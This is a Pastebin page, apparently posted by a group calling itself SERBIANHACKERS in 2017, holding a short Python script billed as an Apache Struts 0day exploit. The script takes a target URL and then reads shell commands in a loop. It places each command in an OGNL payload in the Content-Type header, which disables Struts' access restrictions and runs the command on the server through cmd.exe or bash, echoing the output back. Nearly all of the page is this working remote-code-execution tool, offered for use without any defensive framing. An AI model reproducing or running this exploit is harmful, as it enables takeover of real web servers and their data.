Advertisement
SERBIANHACKERS

SRBTOOL | Apache strut 0day exploit #1

Mar 29th, 2017
103
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 1.17 KB | None | 0 0
  1. import urllib2
  2.  
  3. print"""
  4. [INFO] Made by SRBHACKERS
  5. [INFO] Follow steps below
  6. """
  7. chk=raw_input('Enter URL : ')
  8. cmd='Witch3r'
  9. while(cmd):
  10.     cmd=raw_input('$Shell:')
  11.     exp = "%{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='" + cmd + " && echo witch3r').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
  12.     req = urllib2.Request(chk, headers={'User-Agent': 'Mozilla/5.0', 'Content-Type': exp})
  13.     con=urllib2.urlopen(req).read()
  14.     end=con.find('witch3r')
  15.     print con[0:end]
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement